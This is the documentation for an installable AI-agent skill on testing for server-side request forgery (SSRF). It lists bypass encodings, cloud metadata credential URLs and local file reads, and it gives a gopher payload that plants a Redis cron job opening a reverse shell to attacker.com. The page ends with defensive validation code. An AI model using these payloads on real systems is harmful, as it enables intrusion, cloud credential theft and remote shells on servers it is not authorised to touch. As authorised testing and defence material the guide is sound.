ssrf-testing
npx skills add https://github.com/ed1s0nz/cyberstrikeai --skill ssrf-testing
Skill documentation
SSRF (Server-Side Request Forgery) Testing
Overview
SSRF (Server-Side Request Forgery) is a vulnerability in which the server is made to issue requests on the attacker's behalf, enabling access to internal network resources, port scanning or firewall bypass. This skill covers detection, exploitation and defense methods for SSRF vulnerabilities.
How the vulnerability works
The application accepts a URL parameter and fetches that URL; an attacker who controls the request target can achieve:
- Internal network resource access
- Local file read
- Port scanning
- Firewall bypass
- Cloud service metadata access
Testing methodology
1. Identify SSRF input points
Common features:
- URL preview / screenshot
- File upload (from a remote URL)
- Webhook callbacks
- API proxy
- Data import
- Image processing
- PDF generation
2. Basic detection
Test the loopback address:
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1]
Test internal IP ranges:
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1
Test the file protocol:
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
3. Bypass techniques
IP address encoding:
127.0.0.1 → 2130706433 (decimal)
127.0.0.1 → 0x7f000001 (hexadecimal)
127.0.0.1 → 0177.0.0.1 (octal)
DNS resolution bypass:
127.0.0.1.xip.io
127.0.0.1.nip.io
localtest.me
URL redirect:
http://attacker.com/redirect → http://127.0.0.1
Protocol confusion:
http://127.0.0.1:80@evil.com
http://evil.com#@127.0.0.1
Exploitation techniques
Internal network probing
Port scanning:
# using Burp Intruder
http://127.0.0.1:22
http://127.0.0.1:3306
http://127.0.0.1:6379
http://127.0.0.1:8080
http://127.0.0.1:9200
Identify services by:
- Response time differences
- Error messages
- HTTP status codes
- Response content
Cloud service metadata
AWS EC2:
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
Google Cloud:
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
Azure:
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01
Alibaba Cloud:
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/ram/security-credentials/
Internal application attacks
Access admin backends:
http://127.0.0.1:8080/admin
http://192.168.1.100/phpmyadmin
Unauthenticated Redis access:
http://127.0.0.1:6379
# then send Redis commands
FastCGI attack:
http://127.0.0.1:9000
# execute commands via the FastCGI protocol
Advanced exploitation
Gopher protocol
Send arbitrary protocol data:
gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0aquit%0d%0a
Redis command execution:
gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
Dict protocol
Port scanning and information gathering:
dict://127.0.0.1:6379/info
dict://127.0.0.1:3306/status
File protocol
Read local files:
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
file:///proc/self/environ
Tool usage
SSRFmap
# basic scan
python3 ssrfmap.py -r request.txt -p url
# port scan
python3 ssrfmap.py -r request.txt -p url -m portscan
# cloud metadata
python3 ssrfmap.py -r request.txt -p url -m cloud
Gopherus
# generate a Gopher payload
python gopherus.py --exploit redis
Burp Collaborator
Detect blind SSRF:
http://burpcollaborator.net
# watch for incoming DNS/HTTP requests
Verification and reporting
Verification steps
- Confirm that the request target can be controlled
- Verify internal resource access or port scanning
- Assess the scope of impact (internal network penetration, data leakage, etc.)
- Record a complete PoC
Report key points
- Vulnerability location and input parameter
- Reachable internal resources or ports
- Complete exploitation steps and PoC
- Remediation advice (URL allowlist, disabling dangerous protocols, etc.)
Defensive measures
Recommended approaches
- URL allowlist
    from urllib.parse import urlparse

    ALLOWED_DOMAINS = ['example.com', 'cdn.example.com']
    parsed = urlparse(url)
    # hostname is lower-cased and excludes userinfo and port; netloc would include both
    if parsed.hostname not in ALLOWED_DOMAINS:
        raise ValueError("Domain not allowed")
- Disable dangerous protocols
  - Only allow http/https
  - Block file://, gopher://, dict://, etc.
- IP address filtering
    import ipaddress

    def is_internal_ip(ip):
        # True for RFC 1918 / other private ranges and for loopback addresses
        return ipaddress.ip_address(ip).is_private or \
               ipaddress.ip_address(ip).is_loopback
- DNS resolution validation
  - Resolve the hostname to obtain its IP addresses
  - Check whether any IP falls in an internal range
- Network isolation
  - Restrict the server's outbound network access
  - Use a proxy server for outbound requests
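The protocol restriction, IP filtering and DNS-resolution checks above combined into one pre-fetch validator, as an added example that is not part of the original skill. It assumes a pluggable `resolver` callable (so it can be tested without DNS), an `ALLOWED_SCHEMES` policy of http/https, and explicitly covers the bypass spellings from section 3 (decimal/hex/octal IPs, userinfo tricks, IPv4-mapped IPv6) and the 100.64.0.0/10 block that the stdlib does not treat as private.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}  # policy assumed for this example
# Carrier-grade NAT space is neither private nor global to the ipaddress module,
# yet Alibaba Cloud's metadata service (100.100.100.200) lives in it.
EXTRA_BLOCKED = [ipaddress.ip_network("100.64.0.0/10")]

def default_resolver(host):
    """Return every A/AAAA answer for host, not just the first one."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def normalize_numeric_host(host):
    """Fold decimal/hex/octal IPv4 spellings (2130706433, 0x7f000001,
    0177.0.0.1) into dotted-quad form, as the fetcher's libc would."""
    try:
        return socket.inet_ntoa(socket.inet_aton(host))
    except OSError:
        return host  # not an IPv4 spelling; treat as a hostname

def is_blocked_ip(ip_str):
    """True for any address an outbound fetcher must never reach."""
    ip = ipaddress.ip_address(ip_str)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    flags = (ip.is_private, ip.is_loopback, ip.is_link_local,
             ip.is_unspecified, ip.is_multicast, ip.is_reserved)
    return any(flags) or any(ip in net for net in EXTRA_BLOCKED)

def validate_outbound_url(url, resolver=default_resolver):
    """Return the resolved addresses if url may be fetched, else raise ValueError.
    Connect to a returned address (never re-resolve) and re-run on each redirect."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parsed.scheme!r}")
    if parsed.username is not None or parsed.password is not None:
        raise ValueError("userinfo not allowed")  # http://127.0.0.1:80@evil.com
    if not parsed.hostname:
        raise ValueError("URL has no host")
    host = normalize_numeric_host(parsed.hostname)
    try:
        addrs = [str(ipaddress.ip_address(host))]  # IP literal: no DNS needed
    except ValueError:
        addrs = resolver(host)  # hostname: vet every address it maps to
    blocked = [a for a in addrs if is_blocked_ip(a)]
    if blocked:
        raise ValueError(f"{host!r} maps to blocked address(es) {blocked}")
    return addrs
```

Re-running the check on every redirect and connecting to the returned address rather than resolving again is what closes the redirect and DNS-rebinding variants of the bypasses listed above.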
Notes
- Only conduct testing in authorized test environments
- Avoid impacting internal systems
- Be aware of which protocols the target supports
- Mind the request rate during testing to avoid triggering defenses